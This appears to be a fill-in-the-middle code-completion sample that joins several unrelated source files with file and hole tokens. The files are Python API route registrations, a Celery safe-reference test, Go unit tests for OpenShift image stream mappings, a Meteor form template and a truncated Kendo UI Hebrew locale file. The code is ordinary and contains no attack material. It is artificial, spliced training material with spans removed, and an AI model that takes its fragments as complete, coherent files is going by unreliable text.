RegisterHttpRouteHandler("GET", "/api/hunts/<hunt_id>/log",
api_plugins.hunt.ApiHuntLogRenderer)
RegisterHttpRouteHandler(
"GET", "/api/reflection/rdfvalue/<type>",
api_plugins.reflection.ApiRDFValueReflectionRenderer)
RegisterHttpRouteHandler(
"GET", "/api/reflection/rdfvalue/all",
api_plugins.reflection.ApiAllRDFValuesReflectionRenderer)
RegisterHttpRouteHandler(
"GET", "/api/stats/store/<component>/metadata",
api_plugins.stats.ApiStatsStoreMetricsMetadataRenderer)
RegisterHttpRouteHandler(
"GET", "/api/stats/store/<component>/metrics/<metric_name>",
api_plugins.stats.ApiStatsStoreMetricRenderer)
RegisterHttpRouteHandler("GET", "/api/users/me/settings",
api_plugins.user.ApiUserSettingsRenderer)
RegisterHttpRouteHandler("POST", "/api/users/me/settings",
api_plugins.user.ApiSetUserSettingsRenderer)<|fim▁end|>
|
response = http.HttpResponse(status=status, content_type="application/json")
response.write(")]}'\n") # XSSI protection
response.write(json.dumps(rendered_data,
|
<|file_name|>test_saferef.py<|end_file_name|><|fim▁begin|>from __future__ import absolute_import
from celery.utils.dispatch.saferef import safe_ref
from celery.tests.utils import Case
class Class1(object):
def x(self):
pass
def fun(obj):
pass
class Class2(object):
def __call__(self, obj):
pass
class SaferefTests(Case):
def setUp(self):
ts = []
ss = []
for x in xrange(5000):
t = Class1()
ts.append(t)
s = safe_ref(t.x, self._closure)
ss.append(s)
ts.append(fun)
ss.append(safe_ref(fun, self._closure))
for x in xrange(30):
t = Class2()
ts.append(t)
s = safe_ref(t, self._closure)
ss.append(s)
self.ts = ts
self.ss = ss<|fim▁hole|> self.closureCount = 0
def tearDown(self):
del self.ts
del self.ss
def testIn(self):
"""Test the "in" operator for safe references (cmp)"""
for t in self.ts[:50]:
self.assertTrue(safe_ref(t.x) in self.ss)
def testValid(self):
"""Test that the references are valid (return instance methods)"""
for s in self.ss:
self.assertTrue(s())
def testShortCircuit(self):
"""Test that creation short-circuits to reuse existing references"""
sd = {}
for s in self.ss:
sd[s] = 1
for t in self.ts:
if hasattr(t, 'x'):
self.assertIn(safe_ref(t.x), sd)
else:
self.assertIn(safe_ref(t), sd)
def testRepresentation(self):
"""Test that the reference object's representation works
XXX Doesn't currently check the results, just that no error
is raised
"""
repr(self.ss[-1])
def _closure(self, ref):
"""Dumb utility mechanism to increment deletion counter"""
self.closureCount += 1<|fim▁end|>
| |
<|file_name|>rest_test.go<|end_file_name|><|fim▁begin|>package imagestreammapping
import (
"fmt"
"net/http"
"reflect"
"strings"
"testing"
etcd "github.com/coreos/etcd/clientv3"
"golang.org/x/net/context"
"k8s.io/apimachinery/pkg/api/errors"
metainternal "k8s.io/apimachinery/pkg/apis/meta/internalversion"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/apimachinery/pkg/watch"
"k8s.io/apiserver/pkg/authentication/user"
apirequest "k8s.io/apiserver/pkg/endpoints/request"
"k8s.io/apiserver/pkg/storage/etcd/etcdtest"
etcdtesting "k8s.io/apiserver/pkg/storage/etcd/testing"
kapi "k8s.io/kubernetes/pkg/api"
"k8s.io/kubernetes/pkg/api/v1"
"k8s.io/kubernetes/pkg/registry/registrytest"
authorizationapi "github.com/openshift/origin/pkg/authorization/apis/authorization"
"github.com/openshift/origin/pkg/authorization/registry/subjectaccessreview"
"github.com/openshift/origin/pkg/image/admission/testutil"
imageapi "github.com/openshift/origin/pkg/image/apis/image"
"github.com/openshift/origin/pkg/image/registry/image"
imageetcd "github.com/openshift/origin/pkg/image/registry/image/etcd"
"github.com/openshift/origin/pkg/image/registry/imagestream"
imagestreametcd "github.com/openshift/origin/pkg/image/registry/imagestream/etcd"
"github.com/openshift/origin/pkg/util/restoptions"
_ "github.com/openshift/origin/pkg/api/install"
)
const testDefaultRegistryURL = "defaultregistry:5000"
var testDefaultRegistry = imageapi.DefaultRegistryFunc(func() (string, bool) { return testDefaultRegistryURL, true })
type fakeSubjectAccessReviewRegistry struct {
}
var _ subjectaccessreview.Registry = &fakeSubjectAccessReviewRegistry{}
func (f *fakeSubjectAccessReviewRegistry) CreateSubjectAccessReview(ctx apirequest.Context, subjectAccessReview *authorizationapi.SubjectAccessReview) (*authorizationapi.SubjectAccessReviewResponse, error) {
return nil, nil
}
func setup(t *testing.T) (etcd.KV, *etcdtesting.EtcdTestServer, *REST) {
etcdStorage, server := registrytest.NewEtcdStorage(t, "")
etcdClient := etcd.NewKV(server.V3Client)
imageStorage, err := imageetcd.NewREST(restoptions.NewSimpleGetter(etcdStorage))
if err != nil {
t.Fatal(err)
}
imageStreamStorage, imageStreamStatus, internalStorage, err := imagestreametcd.NewREST(restoptions.NewSimpleGetter(etcdStorage), testDefaultRegistry, &fakeSubjectAccessReviewRegistry{}, &testutil.FakeImageStreamLimitVerifier{})
if err != nil {
t.Fatal(err)
}
imageRegistry := image.NewRegistry(imageStorage)
imageStreamRegistry := imagestream.NewRegistry(imageStreamStorage, imageStreamStatus, internalStorage)
storage := NewREST(imageRegistry, imageStreamRegistry, testDefaultRegistry)
return etcdClient, server, storage
}
func validImageStream() *imageapi.ImageStream {
return &imageapi.ImageStream{
ObjectMeta: metav1.ObjectMeta{
Name: "test",
},
}
}
const testImageID = "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
func validNewMappingWithName() *imageapi.ImageStreamMapping {
return &imageapi.ImageStreamMapping{
ObjectMeta: metav1.ObjectMeta{
Namespace: "default",
Name: "somerepo",
},
Image: imageapi.Image{
ObjectMeta: metav1.ObjectMeta{
Name: testImageID,
Annotations: map[string]string{imageapi.ManagedByOpenShiftAnnotation: "true"},
},
DockerImageReference: "localhost:5000/default/somerepo@" + testImageID,
DockerImageMetadata: imageapi.DockerImage{
Config: &imageapi.DockerConfig{
Cmd: []string{"ls", "/"},
Env: []string{"a=1"},
ExposedPorts: map[string]struct{}{"1234/tcp": {}},
Memory: 1234,
CPUShares: 99,
WorkingDir: "/workingDir",
},
},
},
Tag: "latest",
}
}
func TestCreateConflictingNamespace(t *testing.T) {
_, server, storage := setup(t)
defer server.Terminate(t)
mapping := validNewMappingWithName()
mapping.Namespace = "some-value"
ch, err := storage.Create(apirequest.WithNamespace(apirequest.NewContext(), "legal-name"), mapping)
if ch != nil {
t.Error("Expected a nil obj, but we got a value")
}
expectedError := "the namespace of the provided object does not match the namespace sent on the request"
if err == nil {
t.Fatalf("Expected '" + expectedError + "', but we didn't get one")
}
if !strings.Contains(err.Error(), expectedError) {
t.Errorf("Expected '"+expectedError+"' error, got '%v'", err.Error())
}
}
func TestCreateImageStreamNotFoundWithName(t *testing.T) {
_, server, storage := setup(t)
defer server.Terminate(t)
obj, err := storage.Create(apirequest.NewDefaultContext(), validNewMappingWithName())
if obj != nil {
t.Errorf("Unexpected non-nil obj %#v", obj)
}
if err == nil {
t.Fatal("Unexpected nil err")
}
e, ok := err.(*errors.StatusError)
if !ok {
t.Fatalf("expected StatusError, got %#v", err)
}
if e, a := http.StatusNotFound, e.ErrStatus.Code; int32(e) != a {
t.Errorf("error status code: expected %d, got %d", e, a)
}
if e, a := "imagestreams", e.ErrStatus.Details.Kind; e != a {
t.Errorf("error status details kind: expected %s, got %s", e, a)
}
if e, a := "somerepo", e.ErrStatus.Details.Name; e != a {
t.Errorf("error status details name: expected %s, got %s", e, a)
}
}
func TestCreateSuccessWithName(t *testing.T) {
client, server, storage := setup(t)
defer server.Terminate(t)
initialRepo := &imageapi.ImageStream{
ObjectMeta: metav1.ObjectMeta{Namespace: "default", Name: "somerepo"},
}
_, err := client.Put(
context.TODO(),
etcdtest.AddPrefix("/imagestreams/default/somerepo"),
runtime.EncodeOrDie(kapi.Codecs.LegacyCodec(v1.SchemeGroupVersion), initialRepo),
)
if err != nil {
t.Fatalf("Unexpected error: %v", err)
}
ctx := apirequest.WithUser(apirequest.NewDefaultContext(), &user.DefaultInfo{})
mapping := validNewMappingWithName()
_, err = storage.Create(ctx, mapping)
if err != nil {
t.Fatalf("Unexpected error creating mapping: %#v", err)
}
image, err := storage.imageRegistry.GetImage(ctx, testImageID, &metav1.GetOptions{})
if err != nil {
t.Fatalf("Unexpected error retrieving image: %#v", err)
}
if e, a := mapping.Image.DockerImageReference, image.DockerImageReference; e != a {
t.Errorf("Expected %s, got %s", e, a)
}
if !reflect.DeepEqual(mapping.Image.DockerImageMetadata, image.DockerImageMetadata) {
t.Errorf("Expected %#v, got %#v", mapping.Image, image)
}
repo, err := storage.imageStreamRegistry.GetImageStream(ctx, "somerepo", &metav1.GetOptions{})
if err != nil {
t.Errorf("Unexpected non-nil err: %#v", err)
}
if e, a := testImageID, repo.Status.Tags["latest"].Items[0].Image; e != a {
t.Errorf("Expected %s, got %s", e, a)
}
}
func TestAddExistingImageWithNewTag(t *testing.T) {
imageID := "sha256:8d812da98d6dd61620343f1a5bf6585b34ad6ed16e5c5f7c7216a525d6aeb772"
existingRepo := &imageapi.ImageStream{
ObjectMeta: metav1.ObjectMeta{
Name: "somerepo",
Namespace: "default",
},
Spec: imageapi.ImageStreamSpec{
DockerImageRepository: "localhost:5000/default/somerepo",
},
Status: imageapi.ImageStreamStatus{
Tags: map[string]imageapi.TagEventList{
"existingTag": {Items: []imageapi.TagEvent{{DockerImageReference: "localhost:5000/somens/somerepo@" + imageID}}},
},
},
}
existingImage := &imageapi.Image{
ObjectMeta: metav1.ObjectMeta{
Name: imageID,
},
DockerImageReference: "localhost:5000/somens/somerepo@" + imageID,
DockerImageMetadata: imageapi.DockerImage{
Config: &imageapi.DockerConfig{
Cmd: []string{"ls", "/"},
Env: []string{"a=1"},
ExposedPorts: map[string]struct{}{"1234/tcp": {}},
Memory: 1234,
CPUShares: 99,
WorkingDir: "/workingDir",
},
},
}
client, server, storage := setup(t)
defer server.Terminate(t)
_, err := client.Put(
context.TODO(),
etcdtest.AddPrefix("/imagestreams/default/somerepo"),
runtime.EncodeOrDie(kapi.Codecs.LegacyCodec(v1.SchemeGroupVersion), existingRepo),
)
if err != nil {
t.Fatalf("Unexpected error: %v", err)
}
_, err = client.Put(
context.TODO(),
etcdtest.AddPrefix("/images/"+imageID), runtime.EncodeOrDie(kapi.Codecs.LegacyCodec(v1.SchemeGroupVersion), existingImage),
)
if err != nil {
t.Fatalf("Unexpected error: %v", err)
}
mapping := imageapi.ImageStreamMapping{
ObjectMeta: metav1.ObjectMeta{
Name: "somerepo",
},
Image: *existingImage,
Tag: "latest",
}
ctx := apirequest.NewDefaultContext()
_, err = storage.Create(ctx, &mapping)
if err != nil {
t.Errorf("Unexpected error creating image stream mapping%v", err)
}
image, err := storage.imageRegistry.GetImage(ctx, imageID, &metav1.GetOptions{})
if err != nil {
t.Errorf("Unexpected error retrieving image: %#v", err)
}
if e, a := mapping.Image.DockerImageReference, image.DockerImageReference; e != a {
t.Errorf("Expected %s, got %s", e, a)
}
if !reflect.DeepEqual(mapping.Image.DockerImageMetadata, image.DockerImageMetadata) {
t.Errorf("Expected %#v, got %#v", mapping.Image, image)
}
repo, err := storage.imageStreamRegistry.GetImageStream(ctx, "somerepo", &metav1.GetOptions{})
if err != nil {
t.Fatalf("Unexpected non-nil err: %#v", err)
}
if e, a := imageID, repo.Status.Tags["latest"].Items[0].Image; e != a {
t.Errorf("Expected %s, got %s", e, a)
}
tagEvent := imageapi.LatestTaggedImage(repo, "latest")
if e, a := image.DockerImageReference, tagEvent.DockerImageReference; e != a {
t.Errorf("Unexpected tracking dockerImageReference: %q != %q", a, e)
}
pullSpec, ok := imageapi.ResolveLatestTaggedImage(repo, "latest")
if !ok {
t.Fatalf("Failed to resolv latest tagged image")
}
if e, a := image.DockerImageReference, pullSpec; e != a {
t.Errorf("Expected %s, got %s", e, a)
}
}
func TestAddExistingImageOverridingDockerImageReference(t *testing.T) {
imageID := "sha256:8d812da98d6dd61620343f1a5bf6585b34ad6ed16e5c5f7c7216a525d6aeb772"
newRepo := &imageapi.ImageStream{
ObjectMeta: metav1.ObjectMeta{
Namespace: "default",
Name: "newrepo",
},
Spec: imageapi.ImageStreamSpec{
DockerImageRepository: "localhost:5000/default/newrepo",
},
Status: imageapi.ImageStreamStatus{
DockerImageRepository: "localhost:5000/default/newrepo",
},
}
existingImage := &imageapi.Image{
ObjectMeta: metav1.ObjectMeta{
Name: imageID,<|fim▁hole|> },
DockerImageReference: "localhost:5000/someproject/somerepo@" + imageID,
DockerImageMetadata: imageapi.DockerImage{
Config: &imageapi.DockerConfig{
Cmd: []string{"ls", "/"},
Env: []string{"a=1"},
ExposedPorts: map[string]struct{}{"1234/tcp": {}},
Memory: 1234,
CPUShares: 99,
WorkingDir: "/workingDir",
},
},
}
client, server, storage := setup(t)
defer server.Terminate(t)
_, err := client.Put(
context.TODO(),
etcdtest.AddPrefix("/imagestreams/default/newrepo"),
runtime.EncodeOrDie(kapi.Codecs.LegacyCodec(v1.SchemeGroupVersion), newRepo),
)
if err != nil {
t.Fatalf("Unexpected error: %v", err)
}
_, err = client.Put(
context.TODO(),
etcdtest.AddPrefix("/images/"+imageID), runtime.EncodeOrDie(kapi.Codecs.LegacyCodec(v1.SchemeGroupVersion), existingImage),
)
if err != nil {
t.Fatalf("Unexpected error: %v", err)
}
mapping := imageapi.ImageStreamMapping{
ObjectMeta: metav1.ObjectMeta{
Name: "newrepo",
},
Image: *existingImage,
Tag: "latest",
}
ctx := apirequest.NewDefaultContext()
_, err = storage.Create(ctx, &mapping)
if err != nil {
t.Fatalf("Unexpected error creating mapping: %#v", err)
}
image, err := storage.imageRegistry.GetImage(ctx, imageID, &metav1.GetOptions{})
if err != nil {
t.Errorf("Unexpected error retrieving image: %#v", err)
}
if e, a := mapping.Image.DockerImageReference, image.DockerImageReference; e != a {
t.Errorf("Expected %s, got %s", e, a)
}
if !reflect.DeepEqual(mapping.Image.DockerImageMetadata, image.DockerImageMetadata) {
t.Errorf("Expected %#v, got %#v", mapping.Image, image)
}
repo, err := storage.imageStreamRegistry.GetImageStream(ctx, "newrepo", &metav1.GetOptions{})
if err != nil {
t.Fatalf("Unexpected non-nil err: %#v", err)
}
if e, a := imageID, repo.Status.Tags["latest"].Items[0].Image; e != a {
t.Errorf("Expected %s, got %s", e, a)
}
tagEvent := imageapi.LatestTaggedImage(repo, "latest")
if e, a := testDefaultRegistryURL+"/default/newrepo@"+imageID, tagEvent.DockerImageReference; e != a {
t.Errorf("Expected %s, got %s", e, a)
}
if tagEvent.DockerImageReference == image.DockerImageReference {
t.Errorf("Expected image stream to have dockerImageReference other than %q", image.DockerImageReference)
}
pullSpec, ok := imageapi.ResolveLatestTaggedImage(repo, "latest")
if !ok {
t.Fatalf("Failed to resolv latest tagged image")
}
if e, a := testDefaultRegistryURL+"/default/newrepo@"+imageID, pullSpec; e != a {
t.Errorf("Expected %s, got %s", e, a)
}
}
func TestAddExistingImageAndTag(t *testing.T) {
existingRepo := &imageapi.ImageStream{
ObjectMeta: metav1.ObjectMeta{
Name: "somerepo",
Namespace: "default",
},
Spec: imageapi.ImageStreamSpec{
DockerImageRepository: "localhost:5000/someproject/somerepo",
/*
Tags: map[string]imageapi.TagReference{
"existingTag": {Tag: "existingTag", Reference: "existingImage"},
},
*/
},
Status: imageapi.ImageStreamStatus{
Tags: map[string]imageapi.TagEventList{
"existingTag": {Items: []imageapi.TagEvent{{DockerImageReference: "existingImage"}}},
},
},
}
existingImage := &imageapi.Image{
ObjectMeta: metav1.ObjectMeta{
Name: "existingImage",
Namespace: "default",
},
DockerImageReference: "localhost:5000/someproject/somerepo@" + testImageID,
DockerImageMetadata: imageapi.DockerImage{
Config: &imageapi.DockerConfig{
Cmd: []string{"ls", "/"},
Env: []string{"a=1"},
ExposedPorts: map[string]struct{}{"1234/tcp": {}},
Memory: 1234,
CPUShares: 99,
WorkingDir: "/workingDir",
},
},
}
client, server, storage := setup(t)
defer server.Terminate(t)
_, err := client.Put(
context.TODO(),
etcdtest.AddPrefix("/imagestreams/default/somerepo"),
runtime.EncodeOrDie(kapi.Codecs.LegacyCodec(v1.SchemeGroupVersion), existingRepo),
)
if err != nil {
t.Fatalf("Unexpected error: %v", err)
}
_, err = client.Put(
context.TODO(),
etcdtest.AddPrefix("/images/default/existingImage"),
runtime.EncodeOrDie(kapi.Codecs.LegacyCodec(v1.SchemeGroupVersion), existingImage),
)
if err != nil {
t.Fatalf("Unexpected error: %v", err)
}
mapping := imageapi.ImageStreamMapping{
Image: *existingImage,
Tag: "existingTag",
}
_, err = storage.Create(apirequest.NewDefaultContext(), &mapping)
if !errors.IsInvalid(err) {
t.Fatalf("Unexpected non-error creating mapping: %#v", err)
}
}
func TestTrackingTags(t *testing.T) {
client, server, storage := setup(t)
defer server.Terminate(t)
stream := &imageapi.ImageStream{
ObjectMeta: metav1.ObjectMeta{
Namespace: "default",
Name: "stream",
},
Spec: imageapi.ImageStreamSpec{
Tags: map[string]imageapi.TagReference{
"tracking": {
From: &kapi.ObjectReference{
Kind: "ImageStreamTag",
Name: "2.0",
},
},
"tracking2": {
From: &kapi.ObjectReference{
Kind: "ImageStreamTag",
Name: "2.0",
},
},
},
},
Status: imageapi.ImageStreamStatus{
Tags: map[string]imageapi.TagEventList{
"tracking": {
Items: []imageapi.TagEvent{
{
DockerImageReference: "foo/bar@sha256:1234",
Image: "1234",
},
},
},
"nontracking": {
Items: []imageapi.TagEvent{
{
DockerImageReference: "bar/baz@sha256:9999",
Image: "9999",
},
},
},
"2.0": {
Items: []imageapi.TagEvent{
{
DockerImageReference: "foo/bar@sha256:1234",
Image: "1234",
},
},
},
},
},
}
_, err := client.Put(
context.TODO(),
etcdtest.AddPrefix("/imagestreams/default/stream"),
runtime.EncodeOrDie(kapi.Codecs.LegacyCodec(v1.SchemeGroupVersion), stream),
)
if err != nil {
t.Fatalf("Unexpected error: %v", err)
}
image := &imageapi.Image{
ObjectMeta: metav1.ObjectMeta{
Name: "sha256:503c75e8121369581e5e5abe57b5a3f12db859052b217a8ea16eb86f4b5561a1",
},
DockerImageReference: "foo/bar@sha256:503c75e8121369581e5e5abe57b5a3f12db859052b217a8ea16eb86f4b5561a1",
}
mapping := imageapi.ImageStreamMapping{
ObjectMeta: metav1.ObjectMeta{
Namespace: "default",
Name: "stream",
},
Image: *image,
Tag: "2.0",
}
ctx := apirequest.WithUser(apirequest.NewDefaultContext(), &user.DefaultInfo{})
_, err = storage.Create(ctx, &mapping)
if err != nil {
t.Fatalf("Unexpected error creating mapping: %v", err)
}
stream, err = storage.imageStreamRegistry.GetImageStream(apirequest.NewDefaultContext(), "stream", &metav1.GetOptions{})
if err != nil {
t.Fatalf("error extracting updated stream: %v", err)
}
for _, trackingTag := range []string{"tracking", "tracking2"} {
tracking := imageapi.LatestTaggedImage(stream, trackingTag)
if tracking == nil {
t.Fatalf("unexpected nil %s TagEvent", trackingTag)
}
if e, a := image.DockerImageReference, tracking.DockerImageReference; e != a {
t.Errorf("dockerImageReference: expected %s, got %s", e, a)
}
if e, a := image.Name, tracking.Image; e != a {
t.Errorf("image: expected %s, got %s", e, a)
}
}
nonTracking := imageapi.LatestTaggedImage(stream, "nontracking")
if nonTracking == nil {
t.Fatal("unexpected nil nontracking TagEvent")
}
if e, a := "bar/baz@sha256:9999", nonTracking.DockerImageReference; e != a {
t.Errorf("dockerImageReference: expected %s, got %s", e, a)
}
if e, a := "9999", nonTracking.Image; e != a {
t.Errorf("image: expected %s, got %s", e, a)
}
}
// TestCreateRetryUnrecoverable ensures that an attempt to create a mapping
// using failing registry update calls will return an error.
func TestCreateRetryUnrecoverable(t *testing.T) {
rest := &REST{
strategy: NewStrategy(testDefaultRegistry),
imageRegistry: &fakeImageRegistry{
createImage: func(ctx apirequest.Context, image *imageapi.Image) error {
return nil
},
},
imageStreamRegistry: &fakeImageStreamRegistry{
getImageStream: func(ctx apirequest.Context, id string, options *metav1.GetOptions) (*imageapi.ImageStream, error) {
return validImageStream(), nil
},
listImageStreams: func(ctx apirequest.Context, options *metainternal.ListOptions) (*imageapi.ImageStreamList, error) {
s := validImageStream()
return &imageapi.ImageStreamList{Items: []imageapi.ImageStream{*s}}, nil
},
updateImageStreamStatus: func(ctx apirequest.Context, repo *imageapi.ImageStream) (*imageapi.ImageStream, error) {
return nil, errors.NewServiceUnavailable("unrecoverable error")
},
},
}
obj, err := rest.Create(apirequest.NewDefaultContext(), validNewMappingWithName())
if err == nil {
t.Errorf("expected an error")
}
if obj != nil {
t.Fatalf("expected a nil result")
}
}
// TestCreateRetryConflictNoTagDiff ensures that attempts to create a mapping
// that result in resource conflicts that do NOT include tag diffs causes the
// create to be retried successfully.
func TestCreateRetryConflictNoTagDiff(t *testing.T) {
firstUpdate := true
rest := &REST{
strategy: NewStrategy(testDefaultRegistry),
imageRegistry: &fakeImageRegistry{
createImage: func(ctx apirequest.Context, image *imageapi.Image) error {
return nil
},
},
imageStreamRegistry: &fakeImageStreamRegistry{
getImageStream: func(ctx apirequest.Context, id string, options *metav1.GetOptions) (*imageapi.ImageStream, error) {
stream := validImageStream()
stream.Status = imageapi.ImageStreamStatus{
Tags: map[string]imageapi.TagEventList{
"latest": {Items: []imageapi.TagEvent{{DockerImageReference: "localhost:5000/someproject/somerepo:original"}}},
},
}
return stream, nil
},
updateImageStreamStatus: func(ctx apirequest.Context, repo *imageapi.ImageStream) (*imageapi.ImageStream, error) {
// For the first update call, return a conflict to cause a retry of an
// image stream whose tags haven't changed.
if firstUpdate {
firstUpdate = false
return nil, errors.NewConflict(imageapi.Resource("imagestreams"), repo.Name, fmt.Errorf("resource modified"))
}
return repo, nil
},
},
}
obj, err := rest.Create(apirequest.NewDefaultContext(), validNewMappingWithName())
if err != nil {
t.Errorf("unexpected error: %v", err)
}
if obj == nil {
t.Fatalf("expected a result")
}
}
// TestCreateRetryConflictTagDiff ensures that attempts to create a mapping
// that result in resource conflicts that DO contain tag diffs causes the
// conflict error to be returned.
func TestCreateRetryConflictTagDiff(t *testing.T) {
firstGet := true
firstUpdate := true
rest := &REST{
strategy: NewStrategy(testDefaultRegistry),
imageRegistry: &fakeImageRegistry{
createImage: func(ctx apirequest.Context, image *imageapi.Image) error {
return nil
},
},
imageStreamRegistry: &fakeImageStreamRegistry{
getImageStream: func(ctx apirequest.Context, id string, options *metav1.GetOptions) (*imageapi.ImageStream, error) {
// For the first get, return a stream with a latest tag pointing to "original"
if firstGet {
firstGet = false
stream := validImageStream()
stream.Status = imageapi.ImageStreamStatus{
Tags: map[string]imageapi.TagEventList{
"latest": {Items: []imageapi.TagEvent{{DockerImageReference: "localhost:5000/someproject/somerepo:original"}}},
},
}
return stream, nil
}
// For subsequent gets, return a stream with the latest tag changed to "newer"
stream := validImageStream()
stream.Status = imageapi.ImageStreamStatus{
Tags: map[string]imageapi.TagEventList{
"latest": {Items: []imageapi.TagEvent{{DockerImageReference: "localhost:5000/someproject/somerepo:newer"}}},
},
}
return stream, nil
},
updateImageStreamStatus: func(ctx apirequest.Context, repo *imageapi.ImageStream) (*imageapi.ImageStream, error) {
// For the first update, return a conflict so that the stream
// get/compare is retried.
if firstUpdate {
firstUpdate = false
return nil, errors.NewConflict(imageapi.Resource("imagestreams"), repo.Name, fmt.Errorf("resource modified"))
}
return repo, nil
},
},
}
obj, err := rest.Create(apirequest.NewDefaultContext(), validNewMappingWithName())
if err == nil {
t.Fatalf("expected an error")
}
if !errors.IsConflict(err) {
t.Errorf("expected a conflict error, got %v", err)
}
if obj != nil {
t.Fatalf("expected a nil result")
}
}
type fakeImageRegistry struct {
listImages func(ctx apirequest.Context, options *metainternal.ListOptions) (*imageapi.ImageList, error)
getImage func(ctx apirequest.Context, id string, options *metav1.GetOptions) (*imageapi.Image, error)
createImage func(ctx apirequest.Context, image *imageapi.Image) error
deleteImage func(ctx apirequest.Context, id string) error
watchImages func(ctx apirequest.Context, options *metainternal.ListOptions) (watch.Interface, error)
updateImage func(ctx apirequest.Context, image *imageapi.Image) (*imageapi.Image, error)
}
func (f *fakeImageRegistry) ListImages(ctx apirequest.Context, options *metainternal.ListOptions) (*imageapi.ImageList, error) {
return f.listImages(ctx, options)
}
func (f *fakeImageRegistry) GetImage(ctx apirequest.Context, id string, options *metav1.GetOptions) (*imageapi.Image, error) {
return f.getImage(ctx, id, options)
}
func (f *fakeImageRegistry) CreateImage(ctx apirequest.Context, image *imageapi.Image) error {
return f.createImage(ctx, image)
}
func (f *fakeImageRegistry) DeleteImage(ctx apirequest.Context, id string) error {
return f.deleteImage(ctx, id)
}
func (f *fakeImageRegistry) WatchImages(ctx apirequest.Context, options *metainternal.ListOptions) (watch.Interface, error) {
return f.watchImages(ctx, options)
}
func (f *fakeImageRegistry) UpdateImage(ctx apirequest.Context, image *imageapi.Image) (*imageapi.Image, error) {
return f.updateImage(ctx, image)
}
type fakeImageStreamRegistry struct {
listImageStreams func(ctx apirequest.Context, options *metainternal.ListOptions) (*imageapi.ImageStreamList, error)
getImageStream func(ctx apirequest.Context, id string, options *metav1.GetOptions) (*imageapi.ImageStream, error)
createImageStream func(ctx apirequest.Context, repo *imageapi.ImageStream) (*imageapi.ImageStream, error)
updateImageStream func(ctx apirequest.Context, repo *imageapi.ImageStream) (*imageapi.ImageStream, error)
updateImageStreamSpec func(ctx apirequest.Context, repo *imageapi.ImageStream) (*imageapi.ImageStream, error)
updateImageStreamStatus func(ctx apirequest.Context, repo *imageapi.ImageStream) (*imageapi.ImageStream, error)
deleteImageStream func(ctx apirequest.Context, id string) (*metav1.Status, error)
watchImageStreams func(ctx apirequest.Context, options *metainternal.ListOptions) (watch.Interface, error)
}
func (f *fakeImageStreamRegistry) ListImageStreams(ctx apirequest.Context, options *metainternal.ListOptions) (*imageapi.ImageStreamList, error) {
return f.listImageStreams(ctx, options)
}
func (f *fakeImageStreamRegistry) GetImageStream(ctx apirequest.Context, id string, options *metav1.GetOptions) (*imageapi.ImageStream, error) {
return f.getImageStream(ctx, id, options)
}
func (f *fakeImageStreamRegistry) CreateImageStream(ctx apirequest.Context, repo *imageapi.ImageStream) (*imageapi.ImageStream, error) {
return f.createImageStream(ctx, repo)
}
func (f *fakeImageStreamRegistry) UpdateImageStream(ctx apirequest.Context, repo *imageapi.ImageStream) (*imageapi.ImageStream, error) {
return f.updateImageStream(ctx, repo)
}
func (f *fakeImageStreamRegistry) UpdateImageStreamSpec(ctx apirequest.Context, repo *imageapi.ImageStream) (*imageapi.ImageStream, error) {
return f.updateImageStreamSpec(ctx, repo)
}
func (f *fakeImageStreamRegistry) UpdateImageStreamStatus(ctx apirequest.Context, repo *imageapi.ImageStream) (*imageapi.ImageStream, error) {
return f.updateImageStreamStatus(ctx, repo)
}
func (f *fakeImageStreamRegistry) DeleteImageStream(ctx apirequest.Context, id string) (*metav1.Status, error) {
return f.deleteImageStream(ctx, id)
}
func (f *fakeImageStreamRegistry) WatchImageStreams(ctx apirequest.Context, options *metainternal.ListOptions) (watch.Interface, error) {
return f.watchImageStreams(ctx, options)
}<|fim▁end|>
|
Annotations: map[string]string{imageapi.ManagedByOpenShiftAnnotation: "true"},
|
<|file_name|>post_submit.js<|end_file_name|><|fim▁begin|>Template.postSubmit.onCreated(function() {
Session.set('postSubmitErrors', {});
});
Template.postSubmit.helpers({
errorMessage: function(field) {
return Session.get('postSubmitErrors')[field];
},
errorClass: function (field) {
return !!Session.get('postSubmitErrors')[field] ? 'has-error' : '';
}
});
Template.postSubmit.onRendered(function(){
// AutoForm.hooks({
// postSubmitForm: hooksObject
// });
<|fim▁hole|>
// Template.postSubmit.events({
// 'submit form': function(e) {
// e.preventDefault();
// var post = {
// url: $(e.target).find('[name=url]').val(),
// title: $(e.target).find('[name=title]').val()
// };
// var errors = validatePost(post);
// if (errors.title || errors.url)
// return Session.set('postSubmitErrors', errors);
// Meteor.call('postInsert', post, function(error, result) {
// // display the error to the user and abort
// if (error)
// return throwError(error.reason);
// // show this result but route anyway
// if (result.postExists)
// throwError('This link has already been posted');
// Router.go('postPage', {_id: result._id});
// });
// }
// });<|fim▁end|>
|
});
|
<|file_name|>kendo.culture.he.js<|end_file_name|><|fim▁begin|>/*
* Kendo UI Web v2014.1.318 (http://kendoui.com)
* Copyright 2014 Telerik AD. All rights reserved.
*
* Kendo UI Web commercial licenses may be obtained at
* http://www.telerik.com/purchase/license-agreement/kendo-ui-web
* If you do not own a commercial license, this file shall be governed by the
* GNU General Public License (GPL) version 3.
* For GPL requirements, please review: http://www.gnu.org/copyleft/gpl.html
*/
(function(f, define){
define([], f);
})(function(){
(function( window, undefined ) {
var kendo = window.kendo || (window.kendo = { cultures: {} });
kendo.cultures["he"] = {
name: "he",
numberFormat: {
pattern: ["-n"],
decimals: 2,
",": ",",
".": ".",
groupSize: [3],
percent: {
pattern: ["-n%","n%"],
decimals: 2,
",": ",",
".": ".",
groupSize: [3],
symbol: "%"
},<|fim▁hole|> pattern: ["$-n","$ n"],
decimals: 2,
",": ",",
".": ".",
groupSize: [3],
symbol: "₪"
}
},
calendars: {
standard: {
days: {
names: ["יום ראשון","יום שני","יום שלישי","יום רביעי","יום חמישי","יום שישי","שבת"],
namesAbbr: ["יום א","יום ב","יום ג","יום ד","יום ה","יום ו","שבת"],
namesShort: ["א","ב","ג","ד","ה","ו","ש"]
},
months: {
names: ["ינואר","פברואר","מרץ","אפריל","מאי","יוני","יולי","אוגוסט","ספטמבר","אוקטובר","נובמבר","דצמבר",""],
namesAbbr: ["ינו","פבר","מרץ","אפר","מאי","יונ","יול","אוג","ספט","אוק","נוב","דצמ",""]
},
AM: ["AM","am","AM"],
PM: ["PM","pm","PM"],
patterns: {
d: "dd/MM/yyyy",
D: "dddd dd MMMM yyyy",
F: "dddd dd MMMM yyyy HH:mm:ss",
